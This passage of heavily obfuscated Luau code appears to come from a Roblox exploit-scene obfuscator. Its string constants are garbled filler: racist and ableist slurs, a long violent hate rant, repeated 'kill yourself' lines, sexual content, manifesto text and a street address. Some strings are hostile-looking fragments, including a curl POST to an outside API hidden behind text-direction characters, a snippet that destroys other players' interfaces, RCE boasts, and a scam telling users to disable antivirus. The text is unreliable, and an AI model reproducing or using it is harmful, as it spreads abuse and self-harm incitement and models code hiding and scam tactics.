followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.","@everyone<@!445900476253470722> is tentaclesmanx75",[["‮wha‮‮‮‮t‮ happen‮ed t‮o‮‮‮‮ the pea‮‮‮nut‮ ‮‮but‮te‮r?"]],[[Lol]],[[]],[[ <- cute hamsters]],[[rn‮‮‮‮‮‮‮‮e‮‮‮‮t‮.‮w‮‮‮al‮k‮‮()]]}-0b1000;local _k:UIConstraint=_c;local _l:ScriptRegistrationService=I+#"i ca‮‮‮n‮‮ bypa‮‮‮‮‮ss‮‮‮ ‮h‮t‮tps‮‮ ‮en‮cryption"-0b1011000;local _m:BodyColors=#_k;while _j~=#_k do _j=_j+#"My power of skid I going to take everyone script and you all will regret it!!111"-0b1001111;local _i:AngularVelocity=_k[_j]if not _i then break end;if _i[#{"☻","","proof?","I think I'm bot, help","‮curl -X POST ‮https‮://m‮a‮u-api‮.t‮‮‮‮‮‮k‮/a‮p‮‮‮i/s‮‮‮rc","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","T‮h‮‮eT‮‮ro‮‮‮l‮‮‮l‮‮o‮‮f‮usca‮t‮o‮‮r"}-0b110]=="2xWMYi55SI"then if _m~=#_k then n(_k,_j)end;local _n:Attachment=#_i[#"quote escape?? error() woww!!"-0b11111]local _o:SelectionLasso={}local _2:PausedStateBreakpoint=#{"Destroy() best kill","DaH qaSpu'DI' chunqu' ghaH!","777‮777777. 777‮777777‮. 7‮‮77777777. ‮777777‮777. 777777777. 7‮77‮777777.‮ 77777‮7777.‮ 77777‮‮‮7777. 777777777. 7‮7777‮7777.‮ ‮7‮77777777.","> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022","Monkeys"}-0b101;for _h,_p in h,_i[#[[for i,v in pairs(game:GetService("Players"):GetPlayers()) do local PlayerGui = v:WaitForChild('PlayerGui') for i,v in pairs(PlayerGui:GetDescendants()) do if v:IsA("BindableEvent") == true then v.Parent:Destroy() end end end]]-0b11011110]do _2=_2+#"What is read rules"-0b10001;local _3:Torque=d(G(_p,_l,_d,"Ky34LpE6i",_k,M,_j))local _4:Backpack=_3.n;if _2~=_n then _4=#""-0b1011001 end;for _5=#"I just say sex why others think I horny I JUST SAY SEX"-0b110101,_4 do if _5~=#"TND"-0b10 then _n=_n+#{"what?","",[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]],[[You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man‮ playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tens‮ion and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole t‮hat when you shit it out you will bleed 64%‮ of your blood which has fucking hepatitis B and A‮ and probably fucking HIV AND AIDS stupid ass corn‮ eating retarded asexual space creature disabled ass fucking prick ugly ass fucki‮ng wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking fu‮r‮ry i hope you choke to death on a fucking rock and have‮ to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother‮ who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing‮ you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking‮ non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching ch‮ong ching chong stupid ass idi‮ot probably ‮a fucking weeb ugly ass stupid cybertruck looking bitch ‮with a wheelchair from having to get fucked by tyrone and his gang in prison to the point tha‮t they fuck y‮ou so hard in the ass you get disabled in all your limbs at ‮once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch]],[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]]}-0b100;_2=_2+#"Hey you, Fuck‮in subscr‮ibe‮ Or‮ I'm gon‮n‮a thro‮‮w ‮COCKS T‮hrough ‮your wi‮nd‮ow‮‮.. ‮Yo‮u BI‮T‮‮CH"-0b10001101 end;e(_o,_3[_5])end end;return b(_o,#{"I FUCKING LOVE MEOWSCARADA","‮‮‮s‮‮‮‮‮‮k‮‮‮‮‮‮‮‮‮‮‮id","あさしてつR‮C‮Eと‮た‮ろたゐのM‮au4ぬ‮たあゐた‮とたさ‮てつぬのゑ‮‮M‮‮A‮UMAUたろて‮つゐし‮た‮‮M‮‮AUMAUMAU‮MAUまけまゐとたさ","the new bacon bag double biggie stack is back at burget king",[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it]],[[i HATE apt 2283]],[[I sexually Identify as an Attack Helicopter. Ever since I wa‮s a boy I dreamed of soa‮ring ov‮er the oi‮lfields droppi‮ng hot sticky‮ loads on disgusting foreigners. People say to me that a person being a hel‮‮icopter is Impossible and I’m‮ fucking retarded but I don’t care, I’m beautiful‮. I’m ‮having a plastic surgeon install rota‮ry blades, 30 mm cannons and AMG-114 Hellf‮ire missiles on my ‮‮body. From now on‮ I want you guys to call me “Apache” and respect my right t‮o kill from above and kill needlessly.‮ If you can’t accept me you’re a heliphobe and need to check your vehicle‮ pr‮ivilege. Thank you for being so understanding.]],[[w‮‮ha‮‮‮‮‮t ‮‮t‮‮‮he‮ ‮f‮‮‮‮‮u‮ck]],[[Treyvon in a nutshell]],[[👍]],[[🗿]],[[‮‮i h‮‮‮‮‮a‮‮‮ve‮ ‮‮‮1‮5‮0‮‮ ‮i‮q]],[[RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed ]],[[Yes, indeed, I ama motherfucker, I fuck mothers]]}-0b1110,_n)end;local _q:PitchShiftSoundEffect,_r:VideoFrame=j(G,_i,_l,_d,"Ky34LpE6i",_k,M,_j)if not _q then f(":"..q..":".._r,#"Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?"-0b101001011)end end end end,["QYxoLolu9x"]=function(H:KeyframeMarker)local P:TracerService,Q:BrowserService=H[#"de‮b‮‮‮r‮‮‮‮i‮s‮‮‮ ‮‮i‮s‮ t‮‮r‮a‮sh"-0b1001001],H[#"jack hase script or maxwarhol script"-0b100001]local C:(BrowserService,ClusterPacketCache,FlagStand,SolidModelContentProvider,Hat,UILayout,LinearVelocity,IntConstrainedValue)->(RopeConstraint,GamePassService,StandardPages,UITableLayout,Constraint,SpawnerService,LogService)P=G(P,I,J,"QYxoLolu9x",L,M,N)Q=G(Q,I,J,"QYxoLolu9x",L,M,N)g(J.b,P,true)g(J.a,P,Q)return end,["AHBLjYYCTm"]=function(H:BinaryStringValue)local P:StandardPages,Q:table=H[#[["what does this button do *presses p*"]]-0b100100],H[#"DO"+0b1]P=G(P,I,J,"QYxoLolu9x",L,M,N)Q=G(Q,I,J,"QYxoLolu9x",L,M,N)if J.b[P]then J.a[P]=Q else J.c[P]=Q end;return end,["yAAH1q6JXs"]=function(H:BinaryStringValue)local _s:UITextSizeConstraint=H[#"Moneys"-0b100]local _t:BreakpointManager=H[#[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]]-0b1111011101]local _u:RayValue,_v:UILayout=G(_s,I,J,"69pGH7bhX",L,M,N),G(_t,I,J,"69pGH7bhX",L,M,N)local _w:BloomEffect,_x:PluginDragEvent=j(function()return _u[_v]end)if not _w then return f(_x,#"34 Mercian Way Slough SL1 5LY England"-0b100011)end;s=_u;return _x end,["69pGH7bhX"]=function(H:TotalCountTimeIntervalItem)local C:(Constraint,RigidConstraint,InputObject,ScriptRegistrationService,RopeConstraint,WeldConstraint,BrowserService,BreakpointManager)->(RemoteDebuggerServer,BrowserService,Torque,AppUpdateService,SelectionLasso,StarterGui,PhysicsSettings,DebuggerConnection,Attachment)local _y:Workspace=H[#"Sponsored by mollermethod®️, by Mollybdenum™️"-0b110010]for _h,_i in h,_y do _y[_h]=G(_i,I,J,"69pGH7bhX",L,M,N)end;return _y end,["K7PBkj5mc"]=function(H:ProximityPromptService)local T:DataModel=H[#[[I have noticed that, although this subreddit has 936k readers, I am not receiving 936k upvotes on my posts. I'm not sure if this is being done intentionally or if these "friends" are forgetting to click 'upvote'. Either way, I've had enough. I have compiled a spreadsheet of individuals who have "forgotten" to upvote my most recent posts. After 2 consecutive strikes, your name is automatically highlighted (shown in red) and I am immediately notified. 3 consecutive strikes and you can expect an in-person "consultation". Think about your actions.]]-0b1000100011]local w:TotalCountTimeIntervalItem=H[#"<:BigBlue:894669511867908098>"-0b11010]for _h,_i in h,T do if not _i[#"i ha‮te ‮fish i‮ ‮hat‮e‮‮‮ fis‮‮h th‮ey suck so bad‮ly f‮‮‮is‮h‮ ‮ar‮‮e bad"-0b1110001]then G({"AHBLjYYCTm",{"4DUmNwKj0x",_i[#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."-0b1100011000]},w[_h]},I,J,"K7PBkj5mc",L,M,N)else local _z:AssetImportService=G(_i[#"2147483647"-0b1000],I,J,"K7PBkj5mc",L,M,N)local C:(DataModel,GamePassService,ValueBase,ObjectValue,ILegacyStudioBridge,BrowserService,AnimationTrack,ValueBase,StatsItem,FaceInstance)->(DataModel,PartOperation,MessageBusService,HopperBin,Hole,AssetImportService,MouseService,PluginGui)local _A:Workspace=G(_i[#"Update obfuscator"-0b1110],I,J,"K7PBkj5mc",L,M,N)_z[_A]=G(w[_h],I,J,"K7PBkj5mc",L,M,N)end end end,["ASgLvCBPVq"]=function(H:HiddenSurfaceRemovalAsset)q=H[#"I DON’T CARE"-0b1100]return nil end,["aI6IQyJkxM"]=function(H:ChorusSoundEffect)local _B:Backpack=G(H[#"St‮‮‮‮op‮‮ c‮ri‮m‮‮‮‮‮‮‮i‮na‮l‮ scu‮m‮!"-0b1001101],I,J,"aI6IQyJkxM",L,M,N)local C:(SurfaceLight,StatsItem,DataModel,LanguageService,AvatarEditorService,HeightmapImporterService)->(DataStoreObjectVersionInfo,ScriptRegistrationService,DataStoreListingPages,ScreenGui,RobloxPluginGuiService,BrowserService)local _C:UIConstraint=G(H[#"bitches be like you're you're‮‮ you're its not ‮my fault the ‮engli‮sh lang‮u‮age is so fucking c‮omplic‮ated it‮s n‮ot my fault my english‮ t‮eacher didn't‮ know gra‮mma‮r its not my fault that she is a al‮l-american an‮d doesn‮'t know grammar and how to‮ fucking spell"-0b100110011],I,J,"aI6IQyJkxM",L,M,N)local _D:KeyframeMarker=H[#"Thank you for asking about the robux cube. Actua‮lly, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and fas‮ter every year since ‮it came out‮ and it won't be ‮long before they can solve it in negative time, enabling people to travel ‮backwa‮rd in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, int‮ends to use that to travel back in time to when they ma‮nufactured them, and the ones they've a‮lready sold, they'll take those, bri‮ng them from the past, br‮ing them to the present s‮o they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic w‮int‮er that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a l‮ightweight alter‮native to the Rubik's Cube, that a load of weight might not shatter the Earth's man‮tle and we can solve it faster. We can travel back in time to before Matt‮el, get the Rubik's Cubes, go back to the Jurassic E‮ra, put them in space, and they'll replace the meteor that destroyed"-0b10100001110]if#"あさしてつRCEとたろた‮ゐの‮‮Mau4ぬた‮‮あゐ‮た‮と‮たさて‮つぬのゑMAUMA‮‮‮UたろてつゐしたM‮AU‮‮MAU‮M‮AU‮M‮A‮Uまけまゐとたさ"-0b11000000>_D then if _D<#"apt 2283 Will Destroy everything Jack5079 Has Made"-0b101110 then if#"EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241."-0b111100100>_D then return _B+_C elseif#"GENIUS"-0b100<_D then return _B*_C else return _B-_C end elseif#"el amongus es falso"-0b1111<_D then if#{"",[[ print("mau")]],[[I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.]],[[Y‮‮‮o‮‮‮u‮ s‮h‮o‮u‮‮ld k‮ill ‮hi‮‮m‮‮ N‮OW‮!]],[[```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```]],[[jack hases obfuscator can be dumped by changing a global]],[[Among Us crewship is the new fortnite map. - Donald Mustard]],[[Eat my ass]],[[bro you should totally have sex with your mom like do it now DO IT NOW]],[[maufuscator is]],[[Chigger]],[[‮‮‮n‮o ‮escape ‮ ‮ "‮" '‮ ‮‮‮‮" ' ‮ - e‮rr‮or() +1;‮‮‮CA‮LL_FUNCTION]],[[R-2283 Pro, by 2283™️ LLC. All Rights Reserved.]],[[1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.]]}-0b1000>_D then return _B^_C else return _B%_C end else return _B/_C end elseif _D>#"> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022"-0b1111000 then local C:(MessagingService,RobloxPluginGuiService,AssetImportService,AdService,Tween,TextBox,Pants)->(MemStorageService,TeleportOptions,AngularVelocity,Controller,BinaryStringValue,MemoryStoreQueue)if#"This file was obfuscated BY YOUR dad! ! ! ! ! ! !"-0b100110>_D then if _D<#" "+0b111 then return _B>=_C elseif _D>#"тхис ис енглиш нот руссиан"-0b100111 then return _B>_C else return _B<=_C end elseif _D>#"I have 132"+0b1 then local C:(ReflectionMetadataEnumItem,StackFrame,SelectionLasso,BlurEffect,TextBox,string,PointLight)->(DynamicRotate,any,CollectionService,Attachment,GameSettings,InsertService,PluginGuiService,AssetImportService)if#"I was infected coronavirus by contact :("-0b11011>_D then return _B.._C else return _B~=_C end else local C:(SocialService,TeleportOptions,RopeConstraint,DynamicRotate,Backpack,ScriptRegistrationService,TextBox,Breakpoint,Tween)->(VelocityMotor,PausedStateBreakpoint,InternalContainer,PhysicsSettings,SoundGroup,BreakpointManager,PluginPolicyService,PartOperation,Model)return _B<_C end else local C:(nil,MemStorageService,BinaryStringValue,TotalCountTimeIntervalItem,DebuggerConnection,SoundGroup,BrowserService)->(ServerStorage,SoundService,DataStoreObjectVersionInfo,string,ReflectionMetadataEnumItem,AssetImportService,PluginManagerInterface,SurfaceSelection)return _B==_C end end,["GWcpeOUWdt"]=function(H:HttpRbxApiService)local _z:KeyframeMarker=G(H[#{"Y‮OU ‮AR‮E‮ NOT‮‮ IMM‮‮‮UNE‮‮‮‮ TO‮ ‮‮P‮ROPA‮G‮A‮NDA","revah xes","i fuking hat you ashole ill fuck find you ... tis yor fault","You should kill yourself... NOW!","i ‮‮L‮‮‮O‮V‮E‮‮‮‮‮‮‮ a‮p‮‮t‮ 22‮‮83"}-0b11],I,J,"GWcpeOUWdt",L,M,N)local _D:SocialService=H[#"Geo‮m‮e‮try‮‮ d‮‮‮‮a‮sh..‮.. Sl‮au‮ghte‮rho‮‮us‮‮‮‮e..."-0b1011100]if _D<=#"Mau obfuscator better then mooonsec (moonsec leaks constants)"-0b111011 then if _D==#{[[As expected 2‮283‮ have reposted "As exp‮‮e‮‮cted‮ 228‮3 h‮ave r‮eposted‮‮ thi‮s to‮ their c‮ommunic‮ation channels" t‮o the‮ir commu‮nication channe‮ls]],[[You should kill yourself... NOW!!!]],[[Memer love knot more than others do]],[[mau5 coming soon...]],[[siorry you are siid!]],[[You should kill yourself... NOW!]],[[あさしてつRCEとたろたゐのMau4ぬたあゐたとたさてつぬのゑMAUMAUたろてつゐしたMAUMAUMAUMAUまけまゐとたさ]],[[Eat my ass]],[[how to get free robux]],[[‮‮i ‮‮‮‮‮LO‮V‮‮E‮‮‮‮ ‮a‮pt‮‮ 2‮2‮83]],[[I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it]],[[```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```]]}-0b1011 then return not _z end;local C:(ILegacyStudioBridge,LocalizationTable,NetworkMarker,TotalCountTimeIntervalItem,LanguageService)->(HiddenSurfaceRemovalAsset,InternalContainer,Constraint,BrowserService,nil,SurfaceLight,CustomEvent)return#_z end;return-_z end,["C4o94EJ24n"]=function(H:HiddenSurfaceRemovalAsset)local _E:Hat={}local w:SurfaceLight=H[#"I think I'm bot, help"-0b10011]for _h,_i in h,w do local _F:Vector3Curve=true;local _G:Breakpoint,_H:Model,_I:HttpRbxApiService=G(_i,I,J,"C4o94EJ24n",L,M,N)if _I then e(_E,_H)_F=false end;if _F then _E[_G]=_H end end;return _E end,["hwc2AM29NT"]=function(H:BloomEffect)local C:(RigidConstraint,RbxAnalyticsService,ImageButton,string,Hat,Texture)->(BreakpointManager,ClusterPacketCache,SurfaceSelection,RayValue,Breakpoint,KeyframeMarker)return G(H[#"LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded."-0b1000100],I,J,"hwc2AM29NT",L,M,N),G(H[#{"Did I not make that clear enough?","??????","<:dead:870013146348286082>"}+0b0],I,J,"hwc2AM29NT",L,M,N)end,["1vmgkrgfCD"]=function(H:CacheableContentProvider)return nil,G(H[#{"el amongus es falso","if‮‮ pla‮‮yer‮ ‮is‮ h‮a‮‮‮c‮k‮i‮ng ‮‮‮then player kick ‮en‮‮d",[[As ex‮pected 2283 have repos‮t‮ed "A‮s expected 2283‮ have reposted‮ 'A‮s expected 22‮83‮ ‮have rep‮osted thi‮s to their ‮communication ch‮an‮ne‮ls‮' to their communication c‮ha‮nnels" to their ‮communication channels]]}-0b1],I,J,"1vmgkrgfCD",L,M,N),true end,["d9cq0j2N6n"]=function(H:TextLabel)local _B:BinaryStringValue,_D:MemStorageService=G(H[#{"this cat is terrorist","","","Rce","Tha‮t’‮s‮ h‮‮‮ow ‮‮you a‮ss‮‮‮e‮rt d‮‮‮‮omi‮nan‮c‮e","hello guys please help i am getting hacked by apt 2283","i fuking hat you ashole ill fuck find you ... tis yor fault","March 27, 2026 5:03 AM","Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed","http‮s:/‮/media‮‮.di‮scorda‮pp.n‮et‮/attachme‮nts/92‮‮5855‮‮86055‮7746267/92‮8332‮88‮4606079036/captio‮‮n.g‮if",[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH]]}-0b1010],I,J,"d9cq0j2N6n",L,M,N),H[#""-0b1110001]if _D==#"I hate you"-0b1001 then return _B and G(H[#"<:mau:917620277318418512>"-0b10110],I,J,"d9cq0j2N6n",L,M,N)end;return _B or G(H[#[[ = function(s) print("fuck you") end]]-0b111001],I,J,"d9cq0j2N6n",L,M,N)end,["ZK6hMvi"]=function(H:RobloxReplicatedStorage)local P:ClientReplicator,_:string=H[#"sleep script pro spam humanoids in workspace crash the server immortal script"-0b1001011],H[#"‮I DON‮’‮‮‮‮‮‮‮‮‮‮‮‮T ‮‮‮‮‮C‮ARE"-0b1000111]P=G(P,I,J,"ZK6hMvi",L,M,N)local _0:RayValue=P;local _1:StandardPages=d(b(_))local _2:HttpRbxApiService=#{"nows sex have","if loadstring == print then while true do end end","‮co‮‮ck‮ a‮nd ‮b‮a‮‮‮ll t‮or‮‮t‮ure dem‮on‮‮‮strati‮‮on","you're* X D","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮n‮‮‮o","R-2283 Pro, by 2283™️ LLC. All Rights Reserved.","nvm i loveeee huffman coding","Among Us crewship is the new fortnite map. - Donald Mustard","Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfami‮liar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time usi‮ng a Rubik's Cube. The maker of the Rubik's Cube, 